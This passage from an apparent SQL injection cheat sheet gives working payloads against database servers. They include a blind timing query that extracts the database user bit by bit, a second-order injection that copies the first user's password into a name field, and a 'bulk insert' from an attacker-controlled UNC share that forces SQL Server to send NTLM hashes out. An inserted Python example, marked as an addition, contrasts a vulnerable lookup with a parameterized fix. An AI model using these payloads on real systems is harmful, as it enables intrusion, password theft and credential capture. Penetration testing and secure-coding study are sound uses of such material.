select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );
Potentially Useful MySQL Functions
• MD5() - MD5 hashing
• SHA1() - SHA1 hashing
• PASSWORD()
• ENCODE()
• COMPRESS() - Compresses data; can be great for reading large binary data in Blind SQL Injections.
• ROW_COUNT()
• SCHEMA()
• VERSION() - Same as @@version
Second Order SQL Injections
Basically you put an SQL Injection into one place and expect it to be unfiltered in another action. This is a common hidden-layer problem.
Name : ' + (SELECT TOP 1 password FROM users ) + '
Email :
If the application uses the name field in an unsafe stored procedure, function, process, etc., then it will insert the first user's password as your name, etc.
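As an added illustration of the second-order case above (this is constructed example code, not part of the original cheat sheet), the Python/sqlite3 snippet below stores the name with a parameterized INSERT, so the first request looks safe, and then a later lookup concatenates the stored name back into SQL text; the fixed lookup beside it parameterizes every query site. Table, column, function names and the sample rows are assumptions.

```python
import sqlite3

# Constructed in-memory database with one pre-existing account.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, email TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("admin", "admin@example.test", "s3cret"))  # constructed sample row
    return db

def register(db, name, email, password):
    # First-order input is handled safely: placeholders, no concatenation.
    db.execute("INSERT INTO users VALUES (?, ?, ?)", (name, email, password))
    return db.execute("SELECT rowid FROM users WHERE name = ?", (name,)).fetchone()[0]

def lookup_email_vulnerable(db, rowid):
    # Second-order flaw: the stored name is trusted because it "was already
    # inserted safely", but the quote inside it now becomes part of the SQL text.
    name = db.execute("SELECT name FROM users WHERE rowid = ?", (rowid,)).fetchone()[0]
    row = db.execute(f"SELECT email FROM users WHERE name = '{name}'").fetchone()
    return row[0] if row else None

def lookup_email_fixed(db, rowid):
    # Same logic, but every query site is parameterized, so stored data can
    # never change the structure of the statement it is later used in.
    name = db.execute("SELECT name FROM users WHERE rowid = ?", (rowid,)).fetchone()[0]
    row = db.execute("SELECT email FROM users WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None

# Constructed name mirroring the quote-break pattern from the page (SQLite dialect).
PAYLOAD_NAME = "' OR name = 'admin' --"

def demo():
    """Returns (what the vulnerable lookup leaks, what the fixed lookup returns)."""
    db = make_db()
    rid = register(db, PAYLOAD_NAME, "attacker@example.test", "x")
    return lookup_email_vulnerable(db, rid), lookup_email_fixed(db, rid)

if __name__ == "__main__":
    print(demo())  # ('admin@example.test', 'attacker@example.test')
```

The vulnerable lookup returns the admin row's e-mail even though the registration step itself was parameterized, which is why input-time filtering alone does not close second-order cases.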
Forcing SQL Server to get NTLM Hashes
This attack can help you get the SQL Server user's Windows password from the target server, but possibly your inbound connection will be firewalled. Can be very useful in internal penetration tests. We force SQL Server to connect to our Windows UNC share and capture the NTLM session data with a tool like Cain & Abel.
Bulk insert from a UNC Share (S)
bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'
Check out the Bulk Insert Reference to understand how you can use bulk insert.
References
Since these notes were collected from several different sources over several years and personal experiences, I may have missed some references. If you believe I missed yours or someone else's then drop me an email (), I'll update it as soon as possible.
• Lots of Stuff